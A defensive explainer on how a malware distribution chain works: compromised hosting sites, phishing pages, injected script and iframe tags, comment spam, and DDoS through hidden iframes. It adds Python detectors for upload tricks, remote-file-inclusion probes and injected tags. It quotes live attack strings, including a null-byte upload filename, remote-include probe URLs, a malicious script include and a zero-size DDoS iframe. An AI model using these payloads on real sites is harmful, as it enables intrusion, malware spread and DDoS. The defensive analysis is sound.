W.O.P.R STORM monitor - Rationale, or Understanding your enemy
NB undergoing changes
The tree structure of the malware process.
On this page, you will find a graphical representation of the tree structure of the malware.
By hovering the mouse over a node, a small popup shows,
and to go to the full explanation, just click on the picture.
After the picture, there are explanations about
- Sites
- The install process
- The browsing process
- DDoS attacks using servers instead of PC zombies
This page is developed by monitoring thousands of attempts to inject code/spam on a site.
By logging, watching, and backtracing the various URLs,
this pattern shows up in almost every instance.
Description of the sites
The Endpoint
Servers - or sites - where the malware is hosted.
Typically, these are sites which have been infected,
and are not owned by the criminals.
The malware comes in many variations:
- .exe files / ActiveX
- Downloader which installs 'fakeware', see e.g. this picture
- RealPlayer exploit
- Flash exploit
- Quickviewer exploit
- And many more exploits...
The files can be placed by using FTP, SSH, a vulnerable HTML upload form etc.
But I have also seen malware hosted in a photo gallery.
This is done by uploading the exe file as a picture:
filename.exe%00.jpg
Notice the %00 part, which is a URL-encoded null byte (hexadecimal zero),
terminating the string before the .jpg part.
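As an added example (not code from the original page), here is a naive upload check in Python that only looks at how the raw filename ends, beside a hardened check that rejects the null byte and validates the extension of the decoded name; the extension allowlist is an assumption:

```python
import os
from urllib.parse import unquote

ALLOWED_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif")  # assumed allowlist


def naive_is_image(filename: str) -> bool:
    """Weak check that only looks at how the raw name ends.
    'filename.exe%00.jpg' ends in '.jpg' and passes, although the %00
    terminates the string in a C-style filesystem call, so the server
    may end up writing filename.exe."""
    return filename.lower().endswith(ALLOWED_EXTENSIONS)


def hardened_is_image(filename: str) -> bool:
    """Handle both a literal null byte and the %00 form shown above,
    refuse path components, and check the extension of the decoded name."""
    decoded = unquote(filename)
    if "\x00" in decoded:
        return False                      # null-byte truncation trick
    if decoded != os.path.basename(decoded) or decoded in ("", ".", ".."):
        return False                      # directory traversal / empty name
    ext = os.path.splitext(decoded)[1].lower()
    return ext in ALLOWED_EXTENSIONS
```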
Apart from direct upload, the criminals use PHP code to place files.
Examples are r57shell and namogofer.
An example of a Danish company whose site was used as a placeholder is described in this article:
http://www.version2.dk/artikel/7100
Phishing/fake site
Contains phishing/fake scanners and/or porn.
Some malware simulates virus scanning,
others show up as a need for a video codec update, or a Flash update.
They can be difficult to investigate, since I have seen examples of 'sites' which:
- Activate a fake scanner
- On the next visit show some kind of porn
- On every visit after that show a 404 Not Found (but the header is 200 OK)
This is probably done by changing the rewrite rules in .htaccess.
Each 'instance' of the malware has its own directory -
I stumbled upon a site where there were 400 directories,
each containing various versions of the malware.
Some of the sites contain only various scripts to redirect to the endpoint.
By using a separate site, the criminals add an extra layer to lay out a 'smoke trail'.
I have put together some screen shots of real malware in the wild here,
and also a couple of reproduced playbacks, which are sourced from the real world
but with modified URIs to stay inside this domain.
Intermediate sites
These sites are normal, trusted sites.
By injecting code, the visitor will be redirected
to a fake/phishing site, or directly to the endpoint.
By trusted sites, I mean publicly trusted sites -
government, companies etc. - sites that people
really trust.
The goal is to inject a simple piece of <script> or <iframe> which will be executed
automatically when the user visits the site.
It basically does nothing but load the next layer from the fake/phishing sites.
An example of script tag:
<script src=http://www.adwadb.mobi/ngg.js></script>
But not all users are affected all the time; here is the start of a JavaScript check from the wild:
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
Notice that only browsers with a language code not in the above list are affected.
This may give some hint about the origin of the code.
Another thing that makes it difficult to find up front:
Some scripts, when loaded, point to msn.com in an <iframe>,
and not to the malware script from the phishing sites.
Furthermore there is a counter, so the criminals can see how many
potential targets (users) are active.
When there are 'enough', they simply replace the script to point at phishing/malware.
Say 1000 active targets: all of them are invoked by changing one single file.
So the buildup process, with redirecting to msn.com, can go on (undiscovered)
for days, weeks, maybe more, since msn.com has so many hits
that a thousand more or less doesn't raise an alert.
Just a little note:
The malware coders are sometimes kind of arrogant;
they use JavaScript like this:
var fuckAntivirus = something.
But this layer is also used to launch DDoS attacks.
See DDoS attacks below.
There are several ways to inject the tags, but the common ones are:
- Injection in files.
When the hacker has gained access to the server, it is done by running a program,
typically installed through remote code injection.
These programs traverse the directories under wwwroot,
and insert/append the tags into every .php, .htm and .html file,
thereby inserting tags into every single page, and probably multiple instances per page,
since comments will be affected as well.
The attacks on WordPress, Mambo server etc. by executing remote PHP scripts should be pretty good examples.
It can also be other programs, Perl scripts etc., or the tags can be placed via FTP, SSH etc.
- SQL injection.
Here the goal is to inject the <script> tags into the body text/links etc. in
database driven sites, CMS systems, shopping systems etc.
Since the HTML is stored in the database fields, it will impact every page in the CMS.
To see an example of how SQL injection is done, take a look here.
There is a description and examples of how to construct methods to find it, and remove it.
An example of a successful SQL injection in the wild (redirecting users to phishing/malware):
http://www.version2.dk/artikel/7958
Trusted sites
These sites are typically blogs or systems where you can post a comment.
Basically all sites where you can post some kind of link,
including Facebook, Twitter etc.
On these systems, the posted content does not contain malware or <script> tags.
Typically, it is things like:
- See (some celebrity nude) here
- Look at this video with asian porn here
- Buy viagra cheap here
- Fantastic financial offer, look here
The links do not point to the malware itself, but to intermediate sites
(so the URL looks trustworthy).
When the user clicks on the link,
he will be redirected from the intermediate site,
over the phishing site and eventually to the malware.
I have put together some screen shots of real malware in the wild here,
where the visual part came from phishing sites,
and also a couple of reproduced playbacks, which are sourced from the real world
but with modified URIs to stay inside this domain.
The playbacks show the user experience when going through the process.
Description of the Construction process
Initial placeholders
The first step in the construction is to find a vulnerable server on which to place the malware.
There are various methods to probe for access:
- Dictionary attack against SSH
- Dictionary attack, or default user/password, against FTP
- Execution of remote code (PHP)
- SQL injection
Dictionary attacks against SSH use common usernames/passwords.
In the log files you can see attempts to log on as
root, admin, john, jane etc.
When using FTP, such as Filezilla, a default user/password is installed.
If you don't change these, you are inviting infection.
Execution of PHP code is very common.
Probes for vulnerability are done by
sending references to code in the query string, such as:
- mosConfig_absolute_path=http://www.visitesantacatarina.com.br/id.txt???
- keynav=1/inc/cmses/aedatingCMS.php?dir[inc]=http://www.shaker-diffusion.com/id.txt???
- keynav=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fjoomla%2Fmambots%2Fcontent%2Fugi%2Fvipo%2F
The probes typically do nothing harmful,
but return information about the system.
See example.
Another example is the namogofer, which just does:
echo md5("just_a_test")
When a positive response is received, it signals vulnerability.
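An added example, not from the original page: a small Python scanner that pulls out query-string parameters carrying a remote URL from access-log lines (the log lines are constructed from the probe strings above, with made-up client addresses), plus the md5 signature that the namogofer probe looks for in the response:

```python
import hashlib
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines modelled on the probe strings above
# (made-up client addresses and timestamps, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2008:13:55:36 +0200] "GET /index.php?option=com_content&view=article HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Oct/2008:13:55:41 +0200] "GET /index.php?mosConfig_absolute_path=http://www.visitesantacatarina.com.br/id.txt??? HTTP/1.1" 200 312 "-" "libwww-perl/5.805"
10.0.0.7 - - [10/Oct/2008:13:56:02 +0200] "GET /blog/?keynav=1/inc/cmses/aedatingCMS.php?dir[inc]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 220 "-" "Mozilla/4.0"
10.0.0.8 - - [10/Oct/2008:13:56:10 +0200] "GET /index.php?keynav=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fjoomla%2Fmambots%2Fcontent%2Fugi%2Fvipo%2F HTTP/1.1" 200 312 "-" "Mozilla/4.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
REMOTE_URL_RE = re.compile(r'(?:https?|ftp)://', re.IGNORECASE)


def rfi_probes(log_text: str) -> list:
    """Return (client, parameter, decoded value) for every query parameter
    whose value embeds a remote URL, which is the shape of a remote-file
    inclusion probe regardless of the parameter name being tried."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl percent-decodes, so the %3A%2F%2F form is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.search(value):
                hits.append((line.split(" ", 1)[0], name, value))
    return hits


# The namogofer probe makes the included code echo md5("just_a_test");
# that digest in a response tells the attacker the include worked, so it
# is also worth watching for in outbound responses or proxy logs.
NAMOGOFER_DIGEST = hashlib.md5(b"just_a_test").hexdigest()


def response_confirms_inclusion(body: str) -> bool:
    return NAMOGOFER_DIGEST in body
```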
Phishing/fake install
The methods for finding sites to place this part are the same
as described under Initial placeholders.
Installing redirectors
The methods for finding sites to place this part are the same
as described under Initial placeholders.
Installing bait
There are various methods to bait.
The obvious one is email, but on the server side,
things like making blog/comment entries with multiple links to intermediate sites,
with keywords such as 'buy viagra', 'see person xyz nude', 'asian porn' etc.
It is done by inspecting the HTML for <form> tags with method="post",
and simply POSTing to them with the links etc.
The POSTs are made according to the field name,
so
email will contain some kind of email address,
and message/comment will contain links formed as <a href=.. or encapsulated in [].
Another trick is to use the link to intermediate sites as the referrer.
When the webmaster sees it in his statistics, he might click the link,
and risk getting infected.
Links to intermediate sites can also be posted on Facebook, Twitter and other sites.
Description of the User browsing process
Requesting malware
Here the user (without his knowledge) requests malware.
User gets infected
By visiting the endpoint, which contains malware, the user (maybe) gets infected.
User redirect endpoint
User requesting phishing
User browsing phishing site
User redirect to phishing
Requesting intermediate
User browsing intermediate
Requesting startingpoint
(note: User thinks it's ok).
User will be redirected, doesn't observe anything
(note: iframe see xoomer).
The innocent/naive user
(note: Thinks the site is ok).
Description of the DDoS process
The innocent user participates in DDoS attacks
(note: through iframe, bots (server/PHP)).
This is done by injecting <iframe> tags where the 'src=' points to the victim.
To hide the request from the user, it is defined with zero size, as in this example:
<iframe src=http://the.DDoS.victim width=0 height=0 frameborder=0></iframe>
To inject on the trusted sites, there are two ways to do that.
File injection. When the hacker has gained access to the server, it is done by running a program.
This program traverses the directory where the files are located, and inserts/appends the tags into
every .php, .htm, .html and .asp file, thereby activating the intermediate layer for every single page.
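As an added example that is not part of the original page, the following Python scanner finds the two injected tag shapes this page describes, the external <script src=...> tag (under Intermediate sites) and the zero-size <iframe> used for DDoS, and walks the web root file types listed above; the trusted host list and the sample page are assumptions:

```python
import os
import re

# Tag shapes the page describes: an appended external <script src=...> and a zero-size <iframe>.
SCRIPT_RE = re.compile(r'<script[^>]*\ssrc=["\']?(https?://[^\s"\'>]+)', re.I)
IFRAME_RE = re.compile(r'<iframe[^>]*>', re.I)
SRC_RE = re.compile(r'\ssrc=["\']?([^\s"\'>]+)', re.I)
ZERO_RE = re.compile(r'\s(?:width|height)=["\']?0(?:px)?["\']?(?=[\s>/])', re.I)
TRUSTED_HOSTS = ("www.example.org",)      # assumption: the site's own host(s)


def find_injected_tags(text, trusted_hosts=TRUSTED_HOSTS):
    """Return (line_no, kind, src) for script includes from a host that is
    not trusted and for iframes declared with zero width or height."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for m in SCRIPT_RE.finditer(line):
            src = m.group(1)
            if src.split("/")[2].lower() not in trusted_hosts:
                hits.append((no, "external-script", src))
        for m in IFRAME_RE.finditer(line):
            if ZERO_RE.search(m.group(0)):
                s = SRC_RE.search(m.group(0))
                hits.append((no, "hidden-iframe", s.group(1) if s else ""))
    return hits


def scan_webroot(root, exts=(".php", ".htm", ".html", ".asp")):
    """Walk a web root the way the injection programs do and report hits per file."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_injected_tags(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample page: one injected script and one hidden iframe beside
# a local script, a script from the site's own host and a normal iframe.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="http://www.example.org/js/menu.js"></script>
</head><body><p>Hello</p>
<script src=http://www.adwadb.mobi/ngg.js></script>
<iframe src=http://the.DDoS.victim width=0 height=0 frameborder=0></iframe>
<iframe src="https://www.example.org/embed" width="300" height="200"></iframe>
</body></html>"""
```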
The innocent user participates in DDoS attacks
(note: see #20 - redundant).
The DDoS victim
(note: zombies, 'tin soldiers', server side (create process)).
There are two ways to get the users into the trap.
Redirector - The user redirector NB to be integrated above
One of them is by issuing direct links to the user.
This is done by things like:
- Referer spam: the end user clicks on it in his web statistics because it is an interesting visitor.
- Blog/Comment spam: this is done by the bots, injecting (posting) interesting links.
- Links in email with an interesting message.
- Messenger is also used to submit links.
- Facebook as well.
- Every system that provides direct link functionality can be used.
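An added example (not from the original page) serving both the Installing bait section and the list above: a Python scorer for a POSTed comment form that counts links in the message/comment field and the bait keywords this page lists; the field names and sample posts are assumptions:

```python
import re

# Link shapes the page mentions: <a href=.. anchors, links encapsulated in
# [...], and bare URLs. The alternation consumes a whole anchor first so a
# URL inside it is not counted twice.
LINK_RE = re.compile(
    r'<a\s[^>]*href=["\']?\S+'     # HTML anchor
    r'|\[url=?[^\]]*\]'            # BBCode-style [url=...]
    r'|https?://\S+',              # bare URL, also the [http://...] form
    re.IGNORECASE)
BAIT_WORDS = ("viagra", "nude", "porn", "financial offer")  # from the page's list
MESSAGE_FIELDS = ("message", "comment", "body", "text")     # assumed field names


def score_comment(fields: dict) -> int:
    """Score a POSTed form: 2 per link and 3 per bait keyword found in a
    message/comment field, 1 for a URL in a homepage-style field."""
    score = 0
    for name, value in fields.items():
        lname = name.lower()
        if lname in MESSAGE_FIELDS:
            score += 2 * len(LINK_RE.findall(value))
            lvalue = value.lower()
            score += 3 * sum(word in lvalue for word in BAIT_WORDS)
        elif lname in ("url", "website", "homepage") and LINK_RE.search(value):
            score += 1
    return score


def is_comment_spam(fields: dict, threshold: int = 5) -> bool:
    return score_comment(fields) >= threshold


# Constructed sample posts (made-up hosts and addresses).
SPAM_POST = {
    "name": "guest",
    "email": "someone@example.com",
    "comment": ("Buy viagra cheap <a href=http://intermediate.example/go>here</a>, "
                "see her nude [http://intermediate.example/vid] "
                "asian porn http://intermediate.example/x"),
}
LEGIT_POST = {
    "name": "Bob",
    "email": "bob@example.com",
    "comment": "Great post, thanks for explaining the .htaccess rewrite rules.",
}
```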